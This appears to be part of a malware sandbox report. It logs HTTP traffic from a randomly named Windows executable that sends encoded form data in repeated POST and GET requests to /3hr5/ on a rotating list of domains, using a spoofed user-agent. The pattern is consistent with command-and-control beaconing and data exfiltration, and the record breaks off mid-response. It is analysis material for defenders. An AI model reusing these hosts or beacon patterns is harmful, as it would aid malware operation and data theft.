                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=JtXC+Nr60HwPAGvxCUT1h6DmSp38BUghcJSIq/Iz5ZethHPMl/6OhY2xRplU/F7Zpd2ZgYLZ7JrPIhfpxQazutksiNQZMq7JHFT7ueQn2t5vn27PfaEg159PUlrVsO8NKB7BlY/HYn3wbp8JIcs3zjqhvrTuheGYjZjsmUGwWJeQt0KRjw==
                                                                                                                              Dec 4, 2023 15:28:39.458811998 CET | 554 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:39 GMT
                                                                                                                              Server: Apache
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Content-Length: 196
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              95 | 192.168.11.20 | 50226 | 91.184.0.200 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:28:41.994136095 CET | 1168 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.opleverdossier.online
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.opleverdossier.online
                                                                                                                              Referer: http://www.opleverdossier.online/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:28:42.177186012 CET | 554 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:42 GMT
                                                                                                                              Server: Apache
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Content-Length: 196
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              96 | 192.168.11.20 | 50227 | 91.184.0.200 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:28:44.691514969 CET | 12914 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.opleverdossier.online
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.opleverdossier.online
                                                                                                                              Referer: http://www.opleverdossier.online/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: T7rPSNgYvP4ARKCH+D4t7mflJxdDgY4P7XVn0eGL4Wr7GAJX09GY6j5jJYAmaUBRKNKlrFNSQPTw8E4iS0Bahg8ceMqYfgjHO78yTJS6QaN72/b2VxPdWi3TSeiJL7lOKoKsF6i1G573Rfy/FjiVGrsKms9HSGDBSCv5SDYCJYy25zfqjsR6SHAh7UQhWbF14ilcHodh7fyDYqQZ+hIMnJ1QNklpJu8/6VasPe9Q+EpPnDPUfWs
                                                                                                                              Dec 4, 2023 15:28:45.045805931 CET5198OUTData Raw: 79 66 57 4f 6f 50 7a 52 64 50 49 2f 4b 73 33 6a 4a 69 78 4d 74 41 2b 4b 38 31 54 7a 56 6d 64 57 49 43 77 73 57 43 6e 79 4a 64 48 6e 74 65 4e 48 77 4b 41 55 52 6c 77 76 4c 63 64 59 47 44 4d 77 4f 44 63 4e 79 6b 50 48 30 55 53 66 78 65 36 6e 6a 6b
                                                                                                                              Data Ascii: yfWOoPzRdPI/Ks3jJixMtA+K81TzVmdWICwsWCnyJdHnteNHwKAURlwvLcdYGDMwODcNykPH0USfxe6njkzozhpvxQvC3JOlPQhkeK+djPGLqtInpy/z3RAszl9tF+5RIxEwFf5W6elbM8kcFdsiYrzpEjklG/3g/ZDyczVn9cGD5NH/HipyoKrybzrUE1FFb43IuqQgQBmqwx44sd8HvOmi3x2v7AtJs4KZ2M+XYjzaoqcPoGe
                                                                                                                              Dec 4, 2023 15:28:45.045979023 CET3912OUTData Raw: 6c 41 61 31 51 34 6f 59 4d 33 59 58 7a 36 4f 6d 36 57 70 6e 4f 61 79 53 7a 74 64 30 37 35 4a 58 36 4b 76 50 4c 6f 79 32 50 77 43 48 4d 4d 59 66 6b 64 57 58 6b 67 54 65 76 59 5a 78 77 59 5a 6c 6c 33 30 7a 59 33 71 75 65 31 65 36 44 6b 64 53 53 53
                                                                                                                              Data Ascii: lAa1Q4oYM3YXz6Om6WpnOaySztd075JX6KvPLoy2PwCHMMYfkdWXkgTevYZxwYZll30zY3que1e6DkdSSSxqeb/ELVVVBCJM7aROlL8O6bayTYNE+EK0sk9Qg8JFFvttn+/zDSfrF1zuzL+HgcHRHFGXKsXUMuXyNERCdhaoTvPZd0URQS2z4N3qKb5QAhgoDXFZZ3Mo7x/m8x5UXL9jLVEEWXmn4jYtn1IBnrfxmKHYnlSzNv5
                                                                                                                              Dec 4, 2023 15:28:45.046143055 CET1340OUTData Raw: 59 4b 77 76 51 51 69 2b 4a 56 6f 7a 58 4d 77 33 45 36 39 35 72 31 4e 50 6d 73 6b 41 4a 58 71 54 32 39 42 59 4a 38 67 68 70 47 47 5a 39 66 57 54 57 78 46 4e 4e 64 70 6d 62 44 73 67 79 65 39 33 72 46 45 45 72 7a 6f 61 4e 58 43 68 53 72 6c 32 32 68
                                                                                                                              Data Ascii: YKwvQQi+JVozXMw3E695r1NPmskAJXqT29BYJ8ghpGGZ9fWTWxFNNdpmbDsgye93rFEErzoaNXChSrl22h2R25F4eyd3m/iPduzRVtpZGDzN/2WTdWLm276pbOh4atxqvJYNVQdKF2KOw0AcqU5NJakmNx4LHK+7vP0Yjcr7GZlxJ/hBf5L6fTIs1V9NbfBcqN/yh5yTt9rJTGVYvQSKz9vS7bTfhNFO99sruvLNw6nTeL1Zna2
                                                                                                                              Dec 4, 2023 15:28:45.046314001 CET2124OUTData Raw: 58 79 6d 34 71 6e 51 42 6c 51 43 71 30 73 71 4a 7a 2b 6c 6d 68 4a 30 2f 55 6d 58 6c 59 55 6f 61 41 6d 54 6a 42 36 51 73 68 42 55 58 58 36 5a 4c 6e 43 4f 4f 79 55 4c 54 73 4f 58 63 59 79 68 66 2b 54 66 61 69 63 69 31 56 64 2f 70 77 69 4a 48 6b 57
                                                                                                                              Data Ascii: Xym4qnQBlQCq0sqJz+lmhJ0/UmXlYUoaAmTjB6QshBUXX6ZLnCOOyULTsOXcYyhf+Tfaici1Vd/pwiJHkWuNQpkriWpmMKMNAlXkbal+OHPJsQMEDedMqNtyhGubssI6VZwMKZdMw7P83Q8eo+bkDCbcP3+4vPhuisi37id6cs7KTda+4KGC/d4eptYyn5x+NgY2OEWjPvGEI9IHmKOmL2/ZoIbORHamiDCzmNBbvgCL9pTG9PD
Dec 4, 2023 15:28:45.223275900 CET | 554 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:44 GMT
                                                                                                                              Server: Apache
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Content-Length: 196
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.11.20 | 50228 | 91.184.0.200 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:28:47.395925999 CET | 546 | OUT | GET /3hr5/?TZd=Ev/i97Tm7R4lDQvwRTbCpMnzZ5SeBkReZZSk+dIP2ayGgCnfpc6J5LuxSZ4Sg1Tim62dxJKo6oeqNUab7HWhjplzx5YkH5PNCw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1
                                                                                                                              Host: www.opleverdossier.online
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:28:47.574867964 CET | 554 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:28:47 GMT
                                                                                                                              Server: Apache
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              Content-Length: 196
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.11.20 | 50229 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:28:52.772299051 CET | 819 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=JgLEhuSq4P9SNwx/IVMcUBWOUfzIJUswkRacotQnSMeH1tow0KOgSGhkJ9IdWAcP1ijRDRSxXBGEyh598ZaiYI1SyZ9hH71oalcM4mpD2j89wKuvqL2jVuUDJymDG4SsNne3P//QMgMg84EoQDIW3TZMFfUcvrC2sKnQ9h7pFi+u2W+vCA==
Dec 4, 2023 15:28:52.954888105 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:52 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.11.20 | 50230 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:28:55.475392103 CET | 1159 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:28:55.658785105 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:55 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.11.20 | 50231 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:28:58.179045916 CET | 5198 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: C44gfViZB1OXzc4OXXg48/GhHopnFDITGDJZ/kKZVrP8ufqc0Xwmj8Hz+CJExrU9EFSnHncqpdWLPJL3z8h2cyIhhsKKMYIdvQUN/Z1tEAcIZ6d9MQVI7tmtT3zREBx2uEcqwvtju5PXYaarTiXqFc0CPUpn0Boya/CMRksMwelP7v1Jsearn2A5hg2jyEDEVAt2C8tegJpzHkfxk6m0UvvzvdTjINljas0e4nSGSmFIgf4LQDl
                                                                                                                              Dec 4, 2023 15:28:58.362132072 CET  353  IN  HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:28:58 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              101         192.168.11.20  50232        91.195.240.19   80                8076  C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                                              Dec 4, 2023 15:29:00.879688025 CET  536  OUT  GET /3hr5/?TZd=EijkiYqzwZN1BhBpIykWY0SibsexD2BbsSiB3fZdeNuUj8Ukz47SSRBmN8cMCE5z6SXuPEOXWwW1mi1FwYWeXvEwrZlQEKUUXQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:29:01.101756096 CET  1340  IN  HTTP/1.1 200 OK
                                                                                                                              date: Mon, 04 Dec 2023 14:29:01 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              vary: Accept-Encoding
                                                                                                                              x-powered-by: PHP/8.1.17
                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_WWvH1T+Y38GcikqyYC/KDWF3YUKcosaCnpyAi1TrmGkDOufDBQTAi48nTmGiNFpIEfK+rhW907u5apLYyPiomQ==
                                                                                                                              last-modified: Mon, 04 Dec 2023 14:29:00 GMT
                                                                                                                              x-cache-miss-from: parking-698fb476bf-cmbck
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_WWvH1T+Y38GcikqyYC/KDWF3YUKcosaCnpyAi1TrmGkDOufDBQTAi48nTmGiNFpIEfK+rhW907u5apLYyPiomQ==><head><meta charset="utf-8"><title>vaultedjewelry.com&nbsp;-&nbsp;vaultedjewelry Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="vaultedjewelry.com is your first and best source for all of the information youre looking f


                                                                                                                              Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              102         192.168.11.20  50233        89.117.169.140  80                8076  C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                                              Dec 4, 2023 15:29:06.684861898 CET  545  OUT  GET /3hr5/?TZd=W8hj+ZAnfVNXO/00LhML7TvkVgnbLHvZg2EZ4Jo9WuG5xJWbZ5L5hN7sKdMlw1DL3P6Y0UBuLzf410vX+kFx4V+xT/ik7P0KhQ==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1
                                                                                                                              Host: www.fisiocomoterapia.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:29:06.850496054 CET  1164  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                              Connection: close
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 707
                                                                                                                              date: Mon, 04 Dec 2023 14:29:06 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              location: https://www.fisiocomoterapia.com/3hr5/?TZd=W8hj+ZAnfVNXO/00LhML7TvkVgnbLHvZg2EZ4Jo9WuG5xJWbZ5L5hN7sKdMlw1DL3P6Y0UBuLzf410vX+kFx4V+xT/ik7P0KhQ==&gpo=NNNtyBQpfR9tJN1
                                                                                                                              platform: hostinger
                                                                                                                              content-security-policy: upgrade-insecure-requests
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                              Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              103         192.168.11.20  50234        54.36.145.173   80                8076  C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                                              Dec 4, 2023 15:29:12.036173105 CET  535  OUT  GET /3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.hormigonesmil.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:29:14.015098095 CET | 774 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                              date: Mon, 04 Dec 2023 14:29:13 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              server: Apache
                                                                                                                              x-powered-by: PHP/7.4
                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                              wpo-cache-status: not cached
                                                                                                                              wpo-cache-message: In the settings, caching is disabled for matches for one of the current request's GET parameters
                                                                                                                              x-redirect-by: WordPress
                                                                                                                              location: http://hormigonesmil.com/3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38
                                                                                                                              x-iplb-request-id: BF60E3DC:C43A_362491AD:0050_656DE238_1FA70:7C3B
                                                                                                                              x-iplb-instance: 52473
                                                                                                                              connection: close
                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.11.20 | 50235 | 74.208.236.243 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:29:24.270245075 CET | 535 | OUT | GET /3hr5/?TZd=C7q+sjkOjeHdW4KfX5XkOV+bb3qVpxl3Mz3wz487ZoyHEt9a0wBYazkTJk6RHURF+VscnNPsgG//B6D/+agfmiMJ8iKN4XKnaw==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:29:24.399466991 CET | 824 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 626
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:29:24 GMT
                                                                                                                              Server: Apache
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.11.20 | 50236 | 216.40.34.41 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:29:34.643704891 CET | 532 | OUT | GET /3hr5/?TZd=lEWuOoHaKeBJFGUazSVmb1afSNtW7c4aGAz9OG4Rjri38H/1L2LaU9Tlv3NTxVqSbHzxo0vPiJpjlRXDX4jfk8ag1kGN3tAtrg==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:29:34.763840914 CET | 1328 | IN | HTTP/1.1 200 OK
                                                                                                                              server: nginx/1.14.2
                                                                                                                              date: Mon, 04 Dec 2023 14:29:34 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              x-download-options: noopen
                                                                                                                              x-permitted-cross-domain-policies: none
                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                              etag: W/"cd0e473ec8f9e0891230436de0f95a52"
                                                                                                                              cache-control: max-age=0, private, must-revalidate
                                                                                                                              x-request-id: 0fe3aa94-5a09-4a48-9d67-89d2b9fb4b2f
                                                                                                                              x-runtime: 0.009046
                                                                                                                              connection: close
